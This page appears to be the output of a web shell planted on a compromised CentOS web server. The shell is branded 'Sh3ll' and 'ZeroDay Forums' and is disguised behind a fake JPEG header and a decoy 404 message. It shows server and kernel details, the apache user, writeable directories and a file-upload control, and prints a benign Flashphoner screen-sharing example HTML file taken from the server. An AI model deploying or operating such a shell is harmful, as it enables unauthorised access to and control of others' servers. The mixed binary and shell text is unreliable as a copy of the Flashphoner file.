����JFIF��� ( %"1"%)+...383,7(-.- 404 Not Found
Sh3ll
OdayForums


Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.20
System : Linux st2.domain.com 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 7.4.20
Disable Function : NONE
Directory :  /usr/local/FlashphonerWebCallServer/client/examples/min/screen-sharing/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //usr/local/FlashphonerWebCallServer/client/examples/min/screen-sharing/Screen-sharing.html
<!DOCTYPE html>
<html>
<head>
    <title>Streaming min</title>
    <!-- JQuery -->
    <script type="text/javascript" src="../../../dependencies/jquery/jquery.js"></script>
    <script type="text/javascript" src="../../../dependencies/jquery/jquery-ui.js"></script>
    <script type="text/javascript" src="../../../dependencies/jquery/jquery.websocket.js"></script>
    <script type="text/javascript" src="../../../dependencies/jquery/jquery.json.js"></script>
    <!-- ****** -->

    <script type="text/javascript" src="../../../dependencies/swf/swfobject.js"></script>
    <!-- WCS JavaScript API -->
    <script type="text/javascript" src="../../../Flashphoner.js"></script>

    <!-- Minimum script for calls -->
    <script type="text/javascript" src="Screen-sharing.js"></script>
    <link rel="chrome-webstore-item" href="https://chrome.google.com/webstore/detail/nlbaajplpmleofphigmgaifhoikjmbkg">
    <!-- Screen sharing extension adapter -->

</head>
<!-- Establish connection on page load -->
<body onload="initAPI()">

<h1>Streaming Minimal Code</h1>

<p>WCS Server URL: <input id="urlServer" type="text" value=""/></p>

<p>Stream name: <input id="streamName" type="text" value="streamName"/><p>

<p>Screen sharing stream name: <input id="screenSharingStreamName" type="text" value="screenSharingStream"/><p>

<p>
    <a href="#" on onclick="connect();return false">connect</a>
    <a href="#" on onclick="publishStream();return false">publish_stream</a>
    <a href="#" on onclick="unPublishStream();return false">unpublish_stream</a>
    <a href="#" on onclick="playStream();return false">play_stream</a>
    <a href="#" on onclick="stopStream();return false">stop_stream</a>
</p>

<p>
    <a href="#" on onclick="shareScreen();return false">share_screen</a>
    <a href="#" on onclick="stopSharing();return false">stop_sharing</a>
    <input type="button" id="installExtensionButton" value="Install extension to enable screen sharing" onclick="installExtension()" style="visibility: visible;">
</p>

<div id="flashVideoWrapper"
     style=" width:320px; height:240px; position: absolute; left: 20px; top: 260px; border: 1px double black;">
    <div id="flashVideoDiv"></div>
</div>
<video id="remoteVideo" width="320" height="240" autoplay
       style="position: absolute; left: 20px; top: 260px; border: 1px double black;"></video>
<video id="localVideo" width="80" height="60" autoplay style="position: absolute; left: 20px; top: 260px;"></video>
<video id="localScreen" width="80" height="60" autoplay style="position: absolute; left: 100px; top: 260px;"></video>
</body>
</html>

ZeroDay Forums Mini